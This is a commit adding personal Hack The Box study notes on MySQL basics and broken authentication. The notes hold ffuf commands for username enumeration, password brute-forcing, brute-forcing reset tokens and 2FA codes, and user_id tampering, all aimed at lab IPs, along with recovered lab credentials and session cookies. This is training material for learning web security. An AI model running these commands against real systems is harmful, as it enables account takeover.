inital commit
This commit is contained in:
21
hack_the_box/HTB SQL Injection Fundamentals.md
Normal file
21
hack_the_box/HTB SQL Injection Fundamentals.md
Normal file
@@ -0,0 +1,21 @@
|
||||
# HTB SQL Injection Fundamentals
|
||||
|
||||
## intro to mysql
|
||||
|
||||
|
||||
djelly@htb[/htb]$ mysql -u root -h docker.hackthebox.eu -P 3306 --skip-ssl -p
|
||||
|
||||
mysql> CREATE DATABASE users;
|
||||
|
||||
mysql> USE users;
|
||||
|
||||
mysql> CREATE TABLE logins (
|
||||
-> id INT,
|
||||
-> username VARCHAR(100),
|
||||
-> password VARCHAR(100),
|
||||
-> date_of_joining DATETIME
|
||||
-> );
|
||||
|
||||
mysql> SHOW TABLES;
|
||||
|
||||
mysql> DESCRIBE <table_name>;
|
||||
58
hack_the_box/htb_broken_ authentication.md
Normal file
58
hack_the_box/htb_broken_ authentication.md
Normal file
@@ -0,0 +1,58 @@
|
||||
# Broken Authentication
|
||||
|
||||
## Enumerating Users
|
||||
|
||||
ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
|
||||
|
||||
94.237.59.119:54491
|
||||
|
||||
ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.119:54491/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
|
||||
|
||||
## Brute-Forcing Passwords
|
||||
|
||||
grep '[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > custom_wordlist.txt
|
||||
|
||||
94.237.55.98:31173
|
||||
ffuf -w ./custom_wordlist.txt -u http://94.237.55.98:31173/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username"
|
||||
|
||||
## Brute-Forcing Password Reset Token
|
||||
|
||||
seq -w 0 9999 > tokens.txt
|
||||
|
||||
ffuf -w ./tokens.txt -u http://94.237.60.154:47607/reset_password.php?token=FUZZ -fr "The provided token is invalid"
|
||||
|
||||
## Brute-Forcing 2fa codes
|
||||
|
||||
ffuf -w ./tokens.txt -u http://94.237.62.147:47987/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=gnpl9fatno1bhbegjdirvk70p4" -d "otp=FUZZ" -fr "Invalid 2FA Code
|
||||
|
||||
### Authentication Bypass via Parameter Modification
|
||||
|
||||
seq -w 0 999 > user_ids.txt
|
||||
|
||||
ffuf -w ./user_ids.txt -u http://94.237.51.81:46189/admin.php?user_id=FUZZ -fr "Could not load admin data"
|
||||
|
||||
|
||||
75736572 3d 6874622d7374646e743b726f6c653d 75736572
|
||||
75736572 3d 6874622d7374646e743b726f6c653d 75736572
|
||||
|
||||
### assessemtn
|
||||
|
||||
created user
|
||||
|
||||
test q97hjg2khvl28mucpu7r8h6kb8
|
||||
admin q97hjg2khvl28mucpu7r8h6kb8
|
||||
root q97hjg2khvl28mucpu7r8h6kb8
|
||||
|
||||
atleast 12 characters no special, atlease 1 number, lower, and upper
|
||||
0123456789aB
|
||||
|
||||
|
||||
|
||||
|
||||
ffuf -w ./xato-net-10-million-usernames.txt -u http://94.237.62.166:45749/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown username or password"
|
||||
|
||||
username is gladys
|
||||
password is dWinaldasD13
|
||||
|
||||
ffuf -w tokens.txt -u http://94.237.63.109:42328/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=f782dbv49aq0fb6o0iutruripj" -d "otp=FUZZ" -fr "Invalid OTP"
|
||||
Test0123456789
|
||||
Reference in New Issue
Block a user